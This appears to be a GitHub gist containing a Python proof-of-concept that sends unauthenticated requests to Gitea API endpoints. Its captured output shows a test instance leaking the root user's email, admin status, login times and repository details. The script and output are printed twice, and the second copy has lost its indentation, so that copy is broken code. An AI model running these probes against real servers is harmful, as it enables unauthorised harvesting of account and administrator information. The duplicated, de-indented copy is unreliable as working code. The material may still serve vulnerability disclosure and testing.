HouqiyuA/gist:b26f5ec024bf6fcb7374375b12d88140

## gistfile1.txt
import requests

def unauthenticated_poc(host="GIEA_URL", port=3000):
    base = f"http://{host}:{port}/api/v1"
    paths = [
        "settings/ui",
        "settings/api",
        "users/root",
        "repos/search"
    ]
    headers = {
        "Accept": "application/json"
    }

    for path in paths:
        url = f"{base}/{path}"
        try:
            resp = requests.get(url, headers=headers, timeout=5)
            print(f"[*] GET {path} → {resp.status_code}")

            if resp.status_code in (200, 401, 403):
                print(resp.text[:500])
            print("-" * 60)
        except Exception as e:
            print(f"[!] Error accessing {path}: {e}")

if __name__ == "__main__":
    unauthenticated_poc()

 '''
 Response:

 [*] GET settings/ui → 200
{"allowed_reactions":["+1","-1","laugh","hooray","confused","heart","rocket","eyes"]}
------------------------------------------------------------
[*] GET settings/api → 200
{"max_response_items":50,"default_paging_num":30,"default_git_trees_per_page":1000,"default_max_blob_size":10485760}
------------------------------------------------------------
[*] GET users/root → 200
{"id":1,"login":"root","full_name":"","email":"qiyuhou2@gmil.com","avatar_url":"http://localhost:3000/user/avatar/root/-1","language":"","is_admin":false,"last_login":"0001-01-01T00:00:00Z","created":"2025-04-28T01:46:43-07:00","username":"root"}
------------------------------------------------------------
[*] GET repos/search → 200
{"ok":true,"data":[{"id":1,"owner":{"id":1,"login":"root","full_name":"","email":"qiyuhou2@gmil.com","avatar_url":"http://localhost:3000/user/avatar/root/-1","language":"zh-CN","is_admin":true,"last_login":"2025-04-29T00:52:10-07:00","created":"2025-04-28T01:46:43-07:00","username":"root"},"name":"fuzzstring","full_name":"root/fuzzstring","description":"","empty":true,"private":false,"fork":false,"template":false,"parent":null,"mirror":false,"size":0,"html_url":"http://localhost:3000/root/fuzzst
------------------------------------------------------------

 '''
	import requests

	def unauthenticated_poc(host="GIEA_URL", port=3000):
	base = f"http://{host}:{port}/api/v1"
	paths = [
	"settings/ui",
	"settings/api",
	"users/root",
	"repos/search"
	]
	headers = {
	"Accept": "application/json"
	}

	for path in paths:
	url = f"{base}/{path}"
	try:
	resp = requests.get(url, headers=headers, timeout=5)
	print(f"[*] GET {path} → {resp.status_code}")

	if resp.status_code in (200, 401, 403):
	print(resp.text[:500])
	print("-" * 60)
	except Exception as e:
	print(f"[!] Error accessing {path}: {e}")

	if __name__ == "__main__":
	unauthenticated_poc()

	'''
	Response:

	[*] GET settings/ui → 200
	{"allowed_reactions":["+1","-1","laugh","hooray","confused","heart","rocket","eyes"]}
	------------------------------------------------------------
	[*] GET settings/api → 200
	{"max_response_items":50,"default_paging_num":30,"default_git_trees_per_page":1000,"default_max_blob_size":10485760}
	------------------------------------------------------------
	[*] GET users/root → 200
	{"id":1,"login":"root","full_name":"","email":"qiyuhou2@gmil.com","avatar_url":"http://localhost:3000/user/avatar/root/-1","language":"","is_admin":false,"last_login":"0001-01-01T00:00:00Z","created":"2025-04-28T01:46:43-07:00","username":"root"}
	------------------------------------------------------------
	[*] GET repos/search → 200
	{"ok":true,"data":[{"id":1,"owner":{"id":1,"login":"root","full_name":"","email":"qiyuhou2@gmil.com","avatar_url":"http://localhost:3000/user/avatar/root/-1","language":"zh-CN","is_admin":true,"last_login":"2025-04-29T00:52:10-07:00","created":"2025-04-28T01:46:43-07:00","username":"root"},"name":"fuzzstring","full_name":"root/fuzzstring","description":"","empty":true,"private":false,"fork":false,"template":false,"parent":null,"mirror":false,"size":0,"html_url":"http://localhost:3000/root/fuzzst
	------------------------------------------------------------

	'''
No results found